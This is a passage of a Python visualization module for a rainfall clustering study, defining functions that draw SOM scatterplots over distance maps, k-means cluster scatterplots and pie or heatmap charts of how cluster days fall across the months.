self.assertEqual(stmt.table_name, 'test1')
self.assertEqual(stmt.alter_specification[0].new_table_name,
'test2')
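For orientation, a minimal pyparsing grammar in the same style as the alter_table_syntax these tests exercise, covering only the RENAME form (a sketch under assumed simplifications, not the project's grammar):

from pyparsing import CaselessKeyword, Optional, Word, alphanums

identifier = Word(alphanums + "_")
rename_table = (
    CaselessKeyword("ALTER") + CaselessKeyword("TABLE")
    + identifier("table_name")
    + CaselessKeyword("RENAME")
    + Optional(CaselessKeyword("TO") | CaselessKeyword("AS"))
    + identifier("new_table_name")
)

stmt = rename_table.parseString("ALTER TABLE test1 RENAME AS test2;")
assert (stmt.table_name, stmt.new_table_name) == ("test1", "test2")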
| 54.228145
| 98
| 0.713836
| 2991
| 25433
| 5.837178
| 0.038449
| 0.180423
| 0.284552
| 0.265766
| 0.940776
| 0.924394
| 0.900452
| 0.89335
| 0.892777
| 0.874105
| 0
| 0.024539
| 0.179609
| 25433
| 468
| 99
| 54.344017
| 0.812221
| 0.000865
| 0
| 0.708229
| 0
| 0
| 0.197843
| 0
| 0
| 0
| 0
| 0
| 0.600998
| 1
| 0.05985
| false
| 0
| 0.007481
| 0
| 0.087282
| 0.002494
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
d450f9d753c063632e390390d792dfdf3e502a4e
| 3089
|
py
|
Python
|
tests/data/test_none_circle_zigzag.py
|
ideasman42/isect_segments-bentley_ottmann
|
19deb3c5be4c2b91689b87548a875054b43e9952
|
[
"MIT"
] | 80
|
2015-12-04T15:06:49.000Z
|
2022-03-02T18:08:15.000Z
|
test/data/test_none_circle_zigzag.py
|
lolistoy/sweepline
|
82a2464f984c119dd438489c5f826e9693a7fabf
|
[
"MIT"
] | 25
|
2015-10-18T13:58:28.000Z
|
2021-06-23T21:54:54.000Z
|
test/data/test_none_circle_zigzag.py
|
lolistoy/sweepline
|
82a2464f984c119dd438489c5f826e9693a7fabf
|
[
"MIT"
] | 37
|
2016-07-06T01:38:33.000Z
|
2022-02-19T03:53:14.000Z
|
data = (
((-0.195090, 0.980785), (0.000000, 1.000000)),
((-0.382683, 0.923880), (-0.195090, 0.980785)),
((-0.555570, 0.831470), (-0.382683, 0.923880)),
((-0.707107, 0.707107), (-0.555570, 0.831470)),
((-0.831470, 0.555570), (-0.707107, 0.707107)),
((-0.923880, 0.382683), (-0.831470, 0.555570)),
((-0.980785, 0.195090), (-0.923880, 0.382683)),
((-0.651678, 0.500014), (0.831491, 0.344416)),
((0.831491, 0.344416), (-0.817293, 0.175582)),
((-0.882707, 0.175581), (0.768508, 0.344415)),
((0.768508, 0.344415), (-0.748323, 0.500013)),
((-0.748323, 0.500013), (0.563604, 0.636396)),
((0.563604, 0.636396), (-0.500013, 0.748323)),
((-0.500013, 0.748323), (0.255585, 0.831492)),
((0.923879, 0.382684), (0.980785, 0.195091)),
((0.831469, 0.555571), (0.923879, 0.382684)),
((0.707106, 0.707108), (0.831469, 0.555571)),
((0.555569, 0.831470), (0.707106, 0.707108)),
((0.382682, 0.923880), (0.555569, 0.831470)),
((0.195089, 0.980786), (0.382682, 0.923880)),
((0.000000, 1.000000), (0.195089, 0.980786)),
((0.255585, 0.831492), (-0.175581, 0.882707)),
((-0.175581, 0.882707), (-0.000000, 0.900000)),
((-0.399988, 0.748323), (0.636395, 0.636397)),
((0.344414, 0.831492), (-0.399988, 0.748323)),
((-0.124420, 0.882707), (0.344414, 0.831492)),
((-0.195090, -0.980785), (0.000000, -1.000000)),
((-0.382683, -0.923880), (-0.195090, -0.980785)),
((-0.555570, -0.831470), (-0.382683, -0.923880)),
((-0.707107, -0.707107), (-0.555570, -0.831470)),
((-0.831470, -0.555570), (-0.707107, -0.707107)),
((-0.923880, -0.382683), (-0.831470, -0.555570)),
((-0.980785, -0.195090), (-0.923880, -0.382683)),
((-1.000000, -0.000000), (-0.980785, -0.195090)),
((-0.651678, -0.500014), (0.831491, -0.344416)),
((0.831491, -0.344416), (-0.817293, -0.175582)),
((-0.817293, -0.175582), (0.900000, -0.000001)),
((0.800000, -0.000000), (-0.882707, -0.175581)),
((-0.882707, -0.175581), (0.768508, -0.344415)),
((0.768508, -0.344415), (-0.748323, -0.500013)),
((-0.748323, -0.500013), (0.563604, -0.636396)),
((0.563604, -0.636396), (-0.500013, -0.748323)),
((-0.500013, -0.748323), (0.255585, -0.831492)),
((0.980785, -0.195091), (1.000000, -0.000001)),
((0.923879, -0.382684), (0.980785, -0.195091)),
((0.831469, -0.555571), (0.923879, -0.382684)),
((0.707106, -0.707108), (0.831469, -0.555571)),
((0.555569, -0.831470), (0.707106, -0.707108)),
((0.382682, -0.923880), (0.555569, -0.831470)),
((0.195089, -0.980786), (0.382682, -0.923880)),
((0.000000, -1.000000), (0.195089, -0.980786)),
((0.255585, -0.831492), (-0.175581, -0.882707)),
((-0.175581, -0.882707), (-0.000000, -0.900000)),
((-0.399988, -0.748323), (0.636395, -0.636397)),
((0.344414, -0.831492), (-0.399988, -0.748323)),
((-0.124420, -0.882707), (0.344414, -0.831492)),
((-1.000000, -0.000000), (-0.980785, 0.195090)),
((-0.000000, 0.900000), (-0.124420, 0.882707)),
((0.636395, 0.636397), (-0.651678, 0.500014)),
((-0.817293, 0.175582), (0.900000, -0.000001)),
((0.800000, -0.000000), (-0.882707, 0.175581)),
((0.980785, 0.195091), (1.000000, -0.000001)),
((-0.000000, -0.900000), (-0.124420, -0.882707)),
((0.636395, -0.636397), (-0.651678, -0.500014)),
)
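Each entry above is one line segment given as a ((x1, y1), (x2, y2)) pair. A naive O(n^2) sketch of the intersection counting such a fixture feeds into (the repository itself uses a Bentley-Ottmann sweep; this brute force only detects strict crossings and ignores shared endpoints and collinear overlap):

from itertools import combinations

def _orient(p, q, r):
    # Sign of the cross product (q - p) x (r - p).
    return (q[0] - p[0]) * (r[1] - p[1]) - (q[1] - p[1]) * (r[0] - p[0])

def segments_cross(s1, s2):
    (a, b), (c, d) = s1, s2
    return (_orient(a, b, c) * _orient(a, b, d) < 0
            and _orient(c, d, a) * _orient(c, d, b) < 0)

print(sum(segments_cross(s, t) for s, t in combinations(data, 2)))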
| 46.104478
| 49
| 0.581418
| 513
| 3089
| 3.500975
| 0.089669
| 0.062361
| 0.053452
| 0.046771
| 0.997773
| 0.997773
| 0.997773
| 0.997773
| 0.997773
| 0.936526
| 0
| 0.633439
| 0.08417
| 3089
| 66
| 50
| 46.80303
| 0.001414
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2e5b253946ffd1eb0830823820b897380db7a0fd
| 5153
|
py
|
Python
|
tests/test_cpu.py
|
hspaans/cs-6502-emulator-python
|
9057a22c92e5d9de568758e109a4cff70d1d5b74
|
[
"MIT"
] | null | null | null |
tests/test_cpu.py
|
hspaans/cs-6502-emulator-python
|
9057a22c92e5d9de568758e109a4cff70d1d5b74
|
[
"MIT"
] | null | null | null |
tests/test_cpu.py
|
hspaans/cs-6502-emulator-python
|
9057a22c92e5d9de568758e109a4cff70d1d5b74
|
[
"MIT"
] | null | null | null |
"""Verifies that the processor class works as expected."""
import m6502
def test_cpu_reset() -> None:
"""
Verify CPU state after CPU Reset.
:return: None
"""
memory = m6502.Memory()
cpu = m6502.Processor(memory)
cpu.reset()
assert (
cpu.program_counter,
cpu.stack_pointer,
cpu.cycles,
cpu.flag_b,
cpu.flag_d,
cpu.flag_i,
) == (0xFCE2, 0x01FD, 0, True, False, True)
def test_cpu_read_byte() -> None:
"""
Verify CPU can read a byte from memory.
The cost of the read operation is 1 cycle, and the state of the CPU is
not changed.
:return: None
"""
memory = m6502.Memory()
cpu = m6502.Processor(memory)
cpu.reset()
memory[0x0001] = 0xA5
value = cpu.read_byte(0x0001)
assert (
cpu.program_counter,
cpu.stack_pointer,
cpu.cycles,
cpu.flag_b,
cpu.flag_d,
cpu.flag_i,
value,
) == (0xFCE2, 0x01FD, 1, True, False, True, 0xA5)
def test_cpu_read_word() -> None:
"""
Verify CPU can read a word from memory.
The cost of the read operation is 2 cycles, and the state of the CPU is
not changed.
:return: None
"""
memory = m6502.Memory()
cpu = m6502.Processor(memory)
cpu.reset()
memory[0x0001] = 0xA5
memory[0x0002] = 0x5A
value = cpu.read_word(0x0001)
assert (
cpu.program_counter,
cpu.stack_pointer,
cpu.cycles,
cpu.flag_b,
cpu.flag_d,
cpu.flag_i,
value,
) == (0xFCE2, 0x01FD, 2, True, False, True, 0x5AA5)
def test_cpu_write_byte() -> None:
"""
Verify CPU can write a byte to memory.
The cost of the write operation is 1 cycle, and the state of the CPU is
not changed.
:return: None
"""
memory = m6502.Memory()
cpu = m6502.Processor(memory)
cpu.reset()
cpu.write_byte(0x0001, 0xA5)
assert (
cpu.program_counter,
cpu.stack_pointer,
cpu.cycles,
cpu.flag_b,
cpu.flag_d,
cpu.flag_i,
memory[0x0001],
) == (0xFCE2, 0x01FD, 1, True, False, True, 0xA5)
def test_cpu_write_word() -> None:
"""
    Verify CPU can write a word to memory.
    The cost of the write operation is 2 cycles, and the state of the CPU is
    not changed.
:return: None
"""
memory = m6502.Memory()
cpu = m6502.Processor(memory)
cpu.reset()
cpu.write_word(0x0001, 0x5AA5)
assert (
cpu.program_counter,
cpu.stack_pointer,
cpu.cycles,
cpu.flag_b,
cpu.flag_d,
cpu.flag_i,
memory[0x0001],
memory[0x0002],
) == (0xFCE2, 0x01FD, 2, True, False, True, 0xA5, 0x5A)
def test_cpu_read_write_byte() -> None:
"""
Verify CPU can read and write a byte from memory.
    The combined cost of the write and read operations is 2 cycles, and the
    state of the CPU is not changed.
:return: None
"""
memory = m6502.Memory()
cpu = m6502.Processor(memory)
cpu.reset()
cpu.write_byte(0x0001, 0xA5)
value = cpu.read_byte(0x0001)
assert (
cpu.program_counter,
cpu.stack_pointer,
cpu.cycles,
cpu.flag_b,
cpu.flag_d,
cpu.flag_i,
value,
) == (0xFCE2, 0x01FD, 2, True, False, True, 0xA5)
def test_cpu_read_write_word() -> None:
"""
    Verify CPU can read and write a word from memory.
    The combined cost of the write and read operations is 4 cycles, and the
    state of the CPU is not changed.
:return: None
"""
memory = m6502.Memory()
cpu = m6502.Processor(memory)
cpu.reset()
cpu.write_word(0x0001, 0x5AA5)
value = cpu.read_word(0x0001)
assert (
cpu.program_counter,
cpu.stack_pointer,
cpu.cycles,
cpu.flag_b,
cpu.flag_d,
cpu.flag_i,
value,
) == (0xFCE2, 0x01FD, 4, True, False, True, 0x5AA5)
def test_cpu_fetch_byte() -> None:
"""
Verify CPU can fetch a byte from memory.
The cost of the fetch operation is 1 cycle, and increases the program
counter by 1. The state of the CPU is not changed further.
:return: None
"""
memory = m6502.Memory()
cpu = m6502.Processor(memory)
cpu.reset()
memory[0xFCE2] = 0xA5
value = cpu.fetch_byte()
assert (
cpu.program_counter,
cpu.stack_pointer,
cpu.cycles,
cpu.flag_b,
cpu.flag_d,
cpu.flag_i,
value,
) == (0xFCE3, 0x01FD, 1, True, False, True, 0xA5)
def test_cpu_fetch_word() -> None:
"""
Verify CPU can fetch a word from memory.
    The cost of the fetch operation is 2 cycles, and increases the program
counter by 2. The state of the CPU is not changed further.
:return: None
"""
memory = m6502.Memory()
cpu = m6502.Processor(memory)
cpu.reset()
memory[0xFCE2] = 0xA5
memory[0xFCE3] = 0x5A
value = cpu.fetch_word()
assert (
cpu.program_counter,
cpu.stack_pointer,
cpu.cycles,
cpu.flag_b,
cpu.flag_d,
cpu.flag_i,
value,
) == (0xFCE4, 0x01FD, 2, True, False, True, 0x5AA5)
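The 0x5AA5 expectations above follow from the 6502's little-endian byte order: the low byte lives at the lower address. A minimal sketch of composing a word read that way (illustrative only, with a dict standing in for memory; not the m6502 package's code):

def read_word_sketch(memory, address):
    # Little-endian: low byte first, high byte at address + 1.
    return memory[address] | (memory[address + 1] << 8)

assert read_word_sketch({0x0001: 0xA5, 0x0002: 0x5A}, 0x0001) == 0x5AA5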
| 23.107623
| 75
| 0.589948
| 699
| 5153
| 4.230329
| 0.094421
| 0.063916
| 0.030436
| 0.063916
| 0.913426
| 0.905648
| 0.854244
| 0.804532
| 0.792019
| 0.742306
| 0
| 0.072367
| 0.305453
| 5153
| 222
| 76
| 23.211712
| 0.753842
| 0.258878
| 0
| 0.835821
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082728
| 0
| 0.067164
| 1
| 0.067164
| false
| 0
| 0.007463
| 0
| 0.074627
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cf610382b223d0e7e702021a934b8f0239f057e6
| 184
|
py
|
Python
|
query_lang/run_antlr.py
|
nikitavlaev/formal-languages
|
4e5212858e7cdaa6f2d5130189f88b66e317d25f
|
[
"Unlicense"
] | null | null | null |
query_lang/run_antlr.py
|
nikitavlaev/formal-languages
|
4e5212858e7cdaa6f2d5130189f88b66e317d25f
|
[
"Unlicense"
] | 2
|
2020-09-17T19:11:45.000Z
|
2020-09-24T08:13:22.000Z
|
query_lang/run_antlr.py
|
nikitavlaev/formal-languages
|
4e5212858e7cdaa6f2d5130189f88b66e317d25f
|
[
"Unlicense"
] | null | null | null |
from query_lang.parsing import ANTLRGrammar
from pathlib import Path
print(ANTLRGrammar(Path('/home/nikita/prog/formal-languages/query_lang/tests/test_data/test5/input.txt')).check())
| 46
| 114
| 0.826087
| 27
| 184
| 5.518519
| 0.777778
| 0.120805
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005714
| 0.048913
| 184
| 4
| 114
| 46
| 0.845714
| 0
| 0
| 0
| 0
| 0.333333
| 0.416216
| 0.416216
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cf68cd1d4566a68f9c89b95b8b02b1279ef83491
| 109
|
py
|
Python
|
torch_base/__init__.py
|
kushantp58/RL_CARLA
|
c5fe2a9743d985f03fe824b7b39cfcb3f9dfb0bc
|
[
"Apache-2.0"
] | 33
|
2021-02-26T10:03:28.000Z
|
2022-03-23T07:24:51.000Z
|
torch_base/__init__.py
|
kushantp58/RL_CARLA
|
c5fe2a9743d985f03fe824b7b39cfcb3f9dfb0bc
|
[
"Apache-2.0"
] | 7
|
2021-03-10T11:52:48.000Z
|
2022-02-06T18:31:09.000Z
|
torch_base/__init__.py
|
kushantp58/RL_CARLA
|
c5fe2a9743d985f03fe824b7b39cfcb3f9dfb0bc
|
[
"Apache-2.0"
] | 7
|
2021-03-17T10:27:07.000Z
|
2022-01-27T05:47:38.000Z
|
from torch_base.torch_model import *
from torch_base.torch_sac import *
from torch_base.torch_agent import *
| 27.25
| 36
| 0.834862
| 18
| 109
| 4.722222
| 0.388889
| 0.317647
| 0.458824
| 0.635294
| 0.564706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110092
| 109
| 3
| 37
| 36.333333
| 0.876289
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
cf7f1b42b10c2f699a550340c1493a741ddba20b
| 188442
|
py
|
Python
|
lib/visualization.py
|
mace2305/c4rainfall
|
ab8343447030e89661f297e4513ac7e826b07a8b
|
[
"MIT"
] | null | null | null |
lib/visualization.py
|
mace2305/c4rainfall
|
ab8343447030e89661f297e4513ac7e826b07a8b
|
[
"MIT"
] | null | null | null |
lib/visualization.py
|
mace2305/c4rainfall
|
ab8343447030e89661f297e4513ac7e826b07a8b
|
[
"MIT"
] | null | null | null |
"""
- loading of SOM products
- functions for generating intermediate plots (SOM model)
- functions for generating final output plots (RHUM, Quiver, AR, kmeans model, RF)
- loading of validation metrics
- functions for generating metrics plots (elbow/CH/DBI, sil plots, DBSCAN)
- misc plot creation functions
- functions for generating evaluations of the full model
"""
import utils
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
import seaborn as sns
import pandas as pd
import cartopy.crs as ccrs
import matplotlib.colors as colors
import dask.array as da
from matplotlib import cm
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
from cartopy import feature as cf
from cartopy.mpl.ticker import LongitudeFormatter, LatitudeFormatter
from shapely import geometry
from timeit import default_timer as timer
from sklearn.preprocessing import minmax_scale, RobustScaler
from sklearn.metrics import brier_score_loss
import collections, gc, time, logging
mpl.rcParams['savefig.dpi'] = 300
logger = logging.getLogger()
mpl_logger = logging.getLogger('matplotlib')
mpl_logger.setLevel(logging.WARNING)
print = logger.info
def grid_width(cluster_num, i=0):  # nearest square above 3 is 4 so return 2; above 6 is 9 so return 3; above 11 is 16 so return 4, etc.
"""
Function to acquire appropriate (square) grid width for plotting.
"""
while i**2 < cluster_num:
i+=1;
return i
def create_multisubplot_axes(n_expected_clusters, width_height=12):
"""
Returns fig object, width/height of figure based off n_expected_clusters, and gridspec created for fig obj.
Good for creating fig obj to use in Jupyter Notebook
"""
fig = plt.figure(constrained_layout=False, figsize=(width_height, width_height))
gw = grid_width(n_expected_clusters)
gridspec = fig.add_gridspec(gw, gw)
return fig, gridspec
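# Added example (not part of the original file): for 7 clusters,
# grid_width(7) == 3, so create_multisubplot_axes(7) lays its subplots
# out on a 3x3 gridspec.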
def create_solo_figure(width_height=15):
fig = plt.figure(figsize=(width_height, width_height))
return fig, fig.add_subplot(111)
def categorical_cmap(nc, nsc, cmap="tab10", continuous=False):
if nc > plt.get_cmap(cmap).N:
raise ValueError("Too many categories for colormap.")
if continuous:
ccolors = plt.get_cmap(cmap)(np.linspace(0,1,nc))
else:
ccolors = plt.get_cmap(cmap)(np.arange(nc, dtype=int))
cols = np.zeros((nc*nsc, 3))
for i, c in enumerate(ccolors):
chsv = mpl.colors.rgb_to_hsv(c[:3])
arhsv = np.tile(chsv,nsc).reshape(nsc,3)
arhsv[:,1] = np.linspace(chsv[1],0.25,nsc)
arhsv[:,2] = np.linspace(chsv[2],1,nsc)
rgb = mpl.colors.hsv_to_rgb(arhsv)
cols[i*nsc:(i+1)*nsc,:] = rgb
cmap = mpl.colors.ListedColormap(cols)
return cmap
def get_meshgrid_xy(model):
x = np.arange(model.gridsize)
y = np.arange(model.gridsize)
return [pt for pt in np.meshgrid(x,y)]
def print_som_scatterplot_with_dmap(model, dest):
# n_datapoints, model.month_names, years, hyperparam_profile,
# mg1, mg2, dmap, winner_coordinates, target_ds, uniq_markers,
# data_prof_save_dir, startlooptime, model.month_names_joined):
## plot 1: dmap + winner scatterplot, obtained via SOM
som_splot_withdmap_starttime = timer(); print(f"{utils.time_now()} - Drawing SOM scatterplot with distance map now.")
iterations, gridsize, training_mode, sigma, learning_rate, random_seed = model.hyperparameters
fig, ax_dmap_splot = create_solo_figure()
mg1, mg2 = get_meshgrid_xy(model)
winner_coordinates = utils.open_pickle(model.winner_coordinates_path)
dmap = utils.open_pickle(model.dmap_path)
target_ds = utils.open_pickle(model.target_ds_preprocessed_path)
# dmap underlay
dmap_col = "summer_r"
ax_dmap_splot.set_title(f"Plots for months: {model.month_names}, {model.sigma} sigma, {model.learning_rate} learning_rate, {model.random_seed} random_seeds\n{model.n_datapoints} input datapoints mapped onto SOM, {iterations} iters, overlaying inter-node distance map (in {dmap_col}).", loc='left')
ax_dmap_splot.use_sticky_edges=False
ax_dmap_splot.set_xticks([i for i in np.linspace(0, gridsize-1, gridsize)])
ax_dmap_splot.set_yticks([i for i in np.linspace(0, gridsize-1, gridsize)])
dmap_plot = ax_dmap_splot.pcolor(mg1, mg2,
dmap, cmap=(cm.get_cmap(dmap_col, gridsize)),
vmin=0, alpha=0.6)
# winners scatterplot
winners_scatterpoints = winner_coordinates + (np.random.random_sample((model.n_datapoints,2))-0.5)/1.2
markers = np.array([model.uniq_markers[month-1] for month in target_ds['time.month'].data]) # list of markers pertaining to this data subset
colors = sns.color_palette("copper", len(model.years)) # colors
cmap, norm = mpl.colors.from_levels_and_colors(range(0, len(model.years)+1), colors)
row_to_colors_dict = {yr:colors[i] for i, yr in enumerate(model.years)} # {2001: (RGB), 2002: (RGB), ...}
years_to_colors = [row_to_colors_dict[yr] for yr in target_ds['time.year'].data] # 2001-01-01: (RGB), 2001-01-02: ...
plots_for_legend = []
for marker in model.uniq_markers:
mask = markers == marker
if len(winners_scatterpoints[:,1][mask])>0:
plots_for_legend.append(ax_dmap_splot.scatter(
winners_scatterpoints[:,1][mask],
winners_scatterpoints[:,0][mask],
norm=norm, marker=marker,
c=np.array(years_to_colors)[mask],
s = 130,
alpha=0.8,
linewidths=1))
# colorbars for dmap & winners_scatterpoints s-plot
axins_dmap = inset_axes(ax_dmap_splot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0,-.05,.99,.015),
bbox_transform=ax_dmap_splot.transAxes);
cbar_dmap = fig.colorbar(dmap_plot, cax=axins_dmap,
label='Distance from other nodes (0.0 indicates a complete similarity to neighboring node)',
orientation='horizontal', pad=0.01);
axins_splot = inset_axes(ax_dmap_splot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(-.1, 0, .01, .99),
bbox_transform=ax_dmap_splot.transAxes); # geometry & placement of cbar
cbar_splot = fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap), cax=axins_splot,
ticks=[i+.5 for i in range(len(model.years))], orientation='vertical', pad=0.5);
cbar_splot.ax.set_yticklabels(model.years); cbar_splot.ax.tick_params(size=3)
ax_dmap_splot.legend(plots_for_legend, model.month_names, ncol=4, loc=9);
print(f"Time taken is {utils.time_since(som_splot_withdmap_starttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_prelim_SOMscplot_{gridsize}x{gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_kmeans_scatterplot(model, dest, optimal_k):
start_kmeanscatter = timer(); print(f"{utils.time_now()} - starting kmeans scatterplot now...")
dmap = utils.open_pickle(model.dmap_path)
labels_ar = utils.open_pickle(model.labels_ar_path)
labels_to_coords = utils.open_pickle(model.labels_to_coords_path)
label_markers = utils.open_pickle(model.label_markers_path)
fig, ax_kmeans_dmap_splot = create_solo_figure()
mg1, mg2 = get_meshgrid_xy(model)
# dmap
dmap_base_ax = fig.add_subplot(111)
dmap_base_ax.set_xticks([i for i in np.linspace(0, model.gridsize-1, model.gridsize)])
dmap_base_ax.set_yticks([i for i in np.linspace(0, model.gridsize-1, model.gridsize)])
dmap_col = "CMRmap_r"
dmap_plot = ax_kmeans_dmap_splot.pcolor(mg1, mg2,
dmap, cmap=(mpl.cm.get_cmap(dmap_col, model.gridsize)),
vmin=0, alpha=.7);
dmap_plot.use_sticky_edges=False;
axins_dmap = inset_axes(ax_kmeans_dmap_splot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0,-.05,.99,.015),
bbox_transform=ax_kmeans_dmap_splot.transAxes);
cbar_dmap = fig.colorbar(dmap_plot, cax=axins_dmap,
label='Distance from other nodes (0.0 indicates a complete similarity to neighboring node)',
orientation='horizontal', pad=0.01);
# scatterplot
num_col, sub_col = (int(optimal_k/2),2) if (optimal_k%2==0) & (optimal_k>9) else (
optimal_k, 1);
c2 = categorical_cmap(13, 2, cmap="tab20c");
y = minmax_scale(labels_ar)
x = labels_to_coords
colors = c2(y)
ax_kmeans_dmap_splot.set_title('2nd clustering via K-means')
for marker in np.unique(label_markers):
mask = label_markers == marker
if len(x[:,1][mask]) > 0:
ax_kmeans_dmap_splot.scatter(
x[:,1][mask],
x[:,0][mask],
alpha=1, marker=marker, s=140, c=colors[mask], linewidths=1, edgecolors=None)
ax_kmeans_dmap_splot.set_facecolor('black')
ax_kmeans_dmap_splot.use_sticky_edges=False
ax_kmeans_dmap_splot.margins(.07,.07)
print(f"Time taken is {utils.time_since(start_kmeanscatter)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_kmeans-scplot_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_ar_plot(model, dest, optimal_k):
ARMonthFracstarttime = timer(); print(f"{utils.time_now()} - starting ar drawing now...")
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
fig, gs_ARMonthFrac = create_multisubplot_axes(optimal_k)
half_month_names = np.ravel([(f'{i} 1st-half', f'{i} 2nd-half') for i in model.month_names])
c4 = categorical_cmap(8, 4, cmap="Dark2_r")
color_indices = np.ravel([(2*(i-1), 2*(i-1)+1) for i in model.months])
for i in range(optimal_k):
ax_ARMonthFrac = fig.add_subplot(gs_ARMonthFrac[i])
cluster_months = target_ds_withClusterLabels.where(target_ds_withClusterLabels.cluster==i, drop=True)['time.month']
firsthalf = cluster_months[cluster_months['time.day']<=15]
secondhalf = cluster_months[cluster_months['time.day']>15]
firsthalf_counts = collections.Counter(firsthalf.data)
secondhalf_counts = collections.Counter(secondhalf.data)
halfmth_label_fraction = np.ravel([(firsthalf_counts[mth], secondhalf_counts[mth]) for mth in model.months])
total_occurances = sum(halfmth_label_fraction)
perc_of_total_sampling = np.round((total_occurances/model.n_datapoints)*100, 1)
patches, text = ax_ARMonthFrac.pie(halfmth_label_fraction,
radius = perc_of_total_sampling/100+.3,
colors=c4(color_indices))
ax_ARMonthFrac.annotate((f"Clust-{i+1},\n won {perc_of_total_sampling}% of rounds ({total_occurances}/{model.n_datapoints})."), (-.5,1))
if i==model.grid_width-1: ax_ARMonthFrac.legend(half_month_names, bbox_to_anchor=(0, 1.3), ncol=4)
print(f"Time taken is {utils.time_since(ARMonthFracstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_ARmonthfrac_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_ar_plot_granular(model, dest, optimal_k):
ARMonthFracstarttime = timer(); print(f"{utils.time_now()} - starting ar (granular) drawing now...")
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
all_clusters = np.unique(target_ds_withClusterLabels.cluster)
fig, axs = plt.subplots(len(model.months),1, figsize=(20,5*len(model.months)), sharey=True)
fig.subplots_adjust(right=0.8, hspace=0.3)
cbar_ax = fig.add_axes([0.81, 0.3, 0.025, 0.4])
cmap = plt.cm.summer_r
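# note: set_bad mutates the shared registered colormap; masked cells will render in 'thistle' instead of the lowest bin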
cmap.set_bad(color='thistle', alpha=0.2)
for mth_i, ax in enumerate(axs):
ds = target_ds_withClusterLabels.where(target_ds_withClusterLabels.time.dt.month==model.months[mth_i], drop=True)
n_bins = 31  # days in the longest month
arr = np.empty([len(all_clusters), n_bins])
extent = (0, arr.shape[1], arr.shape[0], 0)
for i, clus in enumerate(all_clusters):
days = ds.where(ds.cluster==clus, drop=True)['time.day']
unique_days = list(np.unique(days))
c = {}
for num in unique_days:
c[num] = int(days.where(days==num).count().values)
arr[i] = np.array([c.get(d, 0) for d in np.arange(1, n_bins+1)])
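# mask zero-count cells so they take the colormap's "bad" color rather than the lowest color bin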
arr = np.ma.masked_where(arr==0, arr)
im = ax.imshow(arr, cmap=cmap, extent=extent)
ax.set_yticks(np.arange(len(all_clusters))+.5)
ax.set_yticklabels(np.arange(len(all_clusters))+1)
ax.set_xticks(np.arange(0,31)+.5)
ax.set_xticklabels(np.arange(1,32))
ax.tick_params(labelsize=14)
ax.grid(False)
ax.set_title(f'{model.month_names[mth_i]}', fontweight='bold', fontsize=20, y=1.02)
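# invisible full-figure axes: carries the shared x/y labels for all monthly subplots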
fig.add_subplot(111,frameon=False)
plt.ylabel('Cluster', fontsize=32, fontweight='bold')
plt.xlabel('Day of month', fontsize=25, labelpad=40, fontweight='bold')
plt.xticks([])
plt.yticks([])
plt.grid(False)
cbar = fig.colorbar(im,cax=cbar_ax,
boundaries=np.arange(1, np.max(arr)+2),
ticks=np.arange(1,np.max(arr)+5)+.5)
cbar.set_label('Number of occurrences on a particular day of the month (days)', labelpad=20)
